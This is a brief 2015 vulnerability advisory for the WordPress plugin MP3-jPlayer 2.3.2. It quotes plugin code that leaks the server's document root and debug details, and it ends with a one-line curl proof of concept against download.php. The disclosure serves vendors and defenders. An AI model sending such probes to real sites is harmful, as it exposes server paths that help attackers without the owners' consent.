Title: Path Disclosure Vulnerability in wordpress plugin MP3-jPlayer v2.3.2
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-12
Download Site: https://wordpress.org/plugins/mp3-jplayer/
Vendor: https://profiles.wordpress.org/simonward-1/
Vendor Notified: 2015-08-06
Vendor Contact:
Description: Easy, Flexible Audio for WordPress.
Vulnerability:
The download code allows arbitrary users to disclose path information on wordpress sites with this plugin installed. 

120                 $info = "<p>
121                         Get: " . $mp3 . "<br />
122                         Sent: " . $sent . "<br />
123                         File: " . $file . "<br />
124                         Open: " . $_SERVER['DOCUMENT_ROOT'] . $fp . "<br />
125                         Root: " . $rooturl . "<br />
126                         pID: " . $playerID . "<br />
127                         Dbug: " . $dbug . "<br />
128                         extension: " . $fileExtension . "</p>";
129                 echo $info;

CVEID:
OSVDB:
Exploit Code:
  • $ curl http://www.example.com/wp-content/plugins/mp3-jplayer/download.php?mp3=.